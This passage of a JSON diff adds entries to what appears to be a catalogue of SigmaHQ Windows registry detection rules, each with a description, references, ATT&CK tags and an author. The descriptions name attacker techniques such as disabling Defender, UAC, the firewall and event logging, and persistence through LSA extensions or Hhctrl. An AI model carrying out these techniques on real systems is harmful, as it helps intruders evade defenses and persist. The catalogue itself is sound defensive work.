"https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", + "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", + "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/10/25", + "filename": "registry_set_disable_macroruntimescanscope.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Disable Microsoft Office Security Features by registry", + "uuid": "7c637634-c95d-4bbf-b26c-a82510874b34", + "value": "Disable Microsoft Office Security Features", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/06/08", + "filename": "registry_set_disable_microsoft_office_security_features.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry modifications that disable Privacy Settings Experience", + "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "value": "Disable Privacy Settings Experience in Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/10/02", + "filename": "registry_set_disable_privacy_settings_experience.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate admin script" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "value": "Disable Windows Security Center Notifications", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_disable_security_center_notifications.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of the registry to disable a system restore on the computer", + "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", + "value": "Registry Disable System Restore", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/04/04", + "filename": "registry_set_disable_system_restore.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "value": "Disable UAC Using Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2022/01/05", + "filename": "registry_set_disable_uac_registry.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "value": "Windows Defender Service Disabled", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_disable_windows_defender_service.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd, frack113, AlertIQ, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", + "value": "Disable Windows Firewall by Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_disable_windows_firewall.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", + "value": "Disable Winevt Event Logging Via Registry", + "meta": { + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889", + "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/07/04", + "filename": "registry_set_disable_winevt_logging.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate administrators disabling specific event log for troubleshooting" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "value": "Add DisallowRun Execution to Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_disallowrun_execution.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box [\u2026] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "value": "Persistence Via Disk Cleanup Handler - Autorun", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "value": "DNS-over-HTTPS Enabled by Registry", + "meta": { + "refs": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://github.com/elastic/detection-rules/issues/1371", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", + "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" + ], + "creation_date": "2021/07/22", + "filename": "registry_set_dns_over_https_enabled.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "value": "DNS ServerLevelPluginDll Install - Registry", + "meta": { + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ], + "creation_date": "2017/05/08", + "filename": "registry_set_dns_serverlevelplugindll.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "value": "Enabling COR Profiler Environment Variables", + "meta": { + "refs": [ + "https://twitter.com/jamieantisocial/status/1304520651248668673", + "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", + "https://www.sans.org/cyber-security-summit/archives", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" + ], + "creation_date": "2020/09/10", + "filename": "registry_set_enabling_cor_profiler_env_variables.yml", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "value": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "meta": { + "refs": [ + "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/06/15", + "filename": "registry_set_enabling_turnoffcheck.yml", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "value": "COMPlus_ETWEnabled Registry Modification - Registry", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_etw_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/06/05", + "filename": "registry_set_etw_disabled.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "value": "Suspicious Application Allowed Through Exploit Guard", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/05", + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "uuid": "e3fdf743-f05b-4051-990a-b66919be1743", + "value": "Change User Account Associated with the FAX Service", + "meta": { + "refs": [ + "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/07/17", + "filename": "registry_set_fax_change_service_user.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect possible persistence using Fax DLL load when service restart", + "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "value": "Change the Fax Dll", + "meta": { + "refs": [ + "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/07/17", + "filename": "registry_set_fax_dll_persistance.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "value": "New File Association Using Exefile", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1461041276514623491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/11/19", + "filename": "registry_set_file_association_exefile.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects persistence using GlobalFlags in image file execution options", + "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", + "value": "GlobalFlags Registry Persistence Mechanisms", + "meta": { + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" + ], + "creation_date": "2018/04/11", + "filename": "registry_set_globalflags_persistence.yml", + "author": "Karneades, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", + "value": "Add Debugger Entry To Hangs Key For Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/wer_debugger.html", + "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_hangs_debugger_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "This value is not set by default but could be rarly used by administrators" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "value": "Persistence Via Hhctrl.ocx", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/hhctrl.html", + "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_hhctrl_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Hides the file extension through modification of the registry", + "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", + "value": "Registry Modification to Hidden File Extension", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", + "https://unit42.paloaltonetworks.com/ransomware-families/", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ], + "creation_date": "2022/01/22", + "filename": "registry_set_hidden_extention.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "value": "Modification of Explorer Hidden Keys", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/04/02", + "filename": "registry_set_hide_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", + "value": "Registry Hide Function from User", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/03/18", + "filename": "registry_set_hide_function_user.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate admin script" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "value": "Hide Schedule Task Via Index Value Tamper", + "meta": { + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/08/26", + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", + "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "value": "Modification of IE Registry Settings", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/01/22", + "filename": "registry_set_ie_persistence.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", + "value": "Register New IFiltre For Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/ifilters.html", + "https://twitter.com/0gtweet/status/1468548924600459267", + "https://github.com/gtworek/PSBits/tree/master/IFilter", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_ifilter_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate registration of IFilters by the OS or software" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "uuid": "d223b46b-5621-4037-88fe-fda32eead684", + "value": "New Root or CA or AuthRoot Certificate to Store", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/04/04", + "filename": "registry_set_install_root_or_ca_certificat.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/05/28", + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "value": "Persistence Via LSA Extensions", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/lsaaextension.html", + "https://twitter.com/0gtweet/status/1476286368385019906", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_lsa_extension_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "value": "Adwind RAT / JRAT - Registry", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2017/11/10", + "filename": "registry_set_mal_adwind.yml", + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", + "value": "Blue Mockingbird - Registry", + "meta": { + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ], + "creation_date": "2020/05/14", + "filename": "registry_set_mal_blue_mockingbird.yml", + "author": "Trent Liffick (@tliffick)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", + "value": "Persistence Via Mpnotify", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/mpnotify.html", + "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", + 